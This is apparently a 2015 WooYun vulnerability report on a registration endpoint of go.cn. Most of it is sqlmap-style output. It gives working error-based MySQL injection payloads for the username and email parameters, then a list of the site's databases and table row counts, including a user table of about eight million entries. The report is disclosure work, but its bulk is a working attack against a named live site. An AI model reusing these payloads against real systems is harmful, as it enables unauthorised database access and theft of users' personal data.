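2015-06-05: Details reported to the vendor; awaiting vendor response
2015-06-10: The vendor actively ignored the vulnerability; details disclosed to the public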
233
Registration endpoint: http://www.go.cn:80/index.php?m=signup (POST)
commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=beijing&do=insert&email=ag&password=wyd&password2=wyD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=wooyun&yanzhengma=1
---
Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(6431=6431,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RTTd'='RTTd&yanzhengma=1
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag' AND (SELECT 8651 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(8651=8651,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'krPi'='krPi&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb&yanzhengma=1
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [10]:
[*] baiduzy
[*] go
[*] go.cn
[*] gocnappapi
[*] gocnopen
[*] mysql
[*] nuomi
[*] percona
[*] performance_schema
[*] test

Database: go.cn
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| jiuder_source_address_history | 31943364 |
| jiuder_user | 8062578 |
| jiuder_adminlog | 6192775 |
| jiuder_KeywordSearchInfo | 5645317 |
| jiuder_smslog_20130817 | 4231301 |
| jiuder_order | 4174809 |
| jiuder_subway_station_group_relation | 2776647 |
| jiuder_maillog | 2422258 |
| jiuder_useraddress | 2366783 |
| jiuder_network | 2275597 |
| jiuder_usercoupons | 1639313 |
| jiuder_access_info | 1512328 |
| jiuder_creditlog | 1487229 |
| jiuder_brand_click | 1152692 |
| jiuder_supplier_tuikuan_flow_log | 1065049 |
| jiuder_group | 1043867 |
| jiuder_baidu_type_group | 1043861 |
| jiuder_group_relation_changecate2 | 1040469 |
| jiuder_group_relation_changecate | 1039236 |
| jiuder_supplier_lalotude | 1032639 |
| jiuder_group_information | 1024431 |
| jiuder_360_type_group | 1004924 |
| jiuder_operation_history | 940136 |
| jiuder_othersites_relation_group | 854442 |
| jiuder_area_business_group_relation | 850113 |
| jiuder_water_table_set | 740059 |
| jiuder_groupcoupons | 736374 |
| jiuder_orderlog | 730253 |
| jiuder_invalid_order | 695579 |
| jiuder_lottery | 675531 |
| jiuder_baidurecord | 475263 |
| jiuder_asyncode_order | 475153 |
| ip_address | 403719 |
| jiuder_smslog | 399792 |
| jiuder_source | 377672 |
| jiuder_user_subjoin | 346186 |
| jiuder_call_log | 340588 |
| jiuder_supplier_schedule | 331731 |
| jiuder_supplier_tuikuan_yunfei | 318747 |
| jiuder_group_property_value | 303649 |
| jiuder_error_log | 274149 |
| jiuder_order_return_log | 216548 |
| jiuder_supplier_tuikuan_flow_log_history | 209341 |
| jiuder_asyncode_order_history | 207810 |
| jiuder_supplier_tuikuan_flow_info | 206542 |
| jiuder_supplier_tuikuan | 198427 |
| jiuder_total_salenum_table | 195616 |
| jiuder_group_relation_type | 157447 |
| jiuder_click_demand | 127518 |
| jiuder_consult | 121296 |
| jiuder_group_property_relation | 120071 |
| jiuder_group_top_gid | 108376 |
| jiuder_order_return | 104903 |
| jiuder_api_visits | 104008 |
| jiuder_complaints | 103539 |
| jiuder_othersites_relation_user | 98315 |
| jiuder_group_oneday_statistics | 97446 |
| jiuder_totalorder | 89057 |
| jiuder_chargecard | 84374 |
| jiuder_KeywordSearchHistory | 84318 |
| jiuder_feedback | 82449 |
| jiuder_ctrip_usetime_change | 75469 |
| jiuder_supplier_tuikuan_flow_info_history | 74400 |
| jiuder_othersites_relation_order | 67580 |
| jiuder_group_property_name | 67258 |
| jiuder_waplog | 58926 |
| jiuder_luckgame_log | 54031 |
| jiuder_source_address | 52825 |
| jiuder_voucher_order_act | 51440 |
| jiuder_daily_statistic | 51089 |
| jiuder_projects | 41561 |
| jiuder_invite | 37080 |
| jiuder_modify_mobilebind | 33033 |
| jiuder_holiday | 28506 |
| jiuder_area_and_business | 25055 |
| jiuder_supplier | 22215 |
| jiuder_change_api_gid | 21420 |
| jiuder_group_api_line | 21329 |
| egg_record | 17002 |
| jiuder_maillist | 13297 |
| jiuder_supplier_tuikuan_account | 12600 |
| jiuder_masses_comments | 11658 |
| jiuder_set_jinshan_api | 11650 |
| tmp | 10000 |
.......................
~~~~~~~~~~~~~ Please don't give up on treatment.
Severity: No impact (ignored by vendor)
Ignored at: 2015-06-10 10:54
Vulnerability Rank: 15 (WooYun rating)
None yet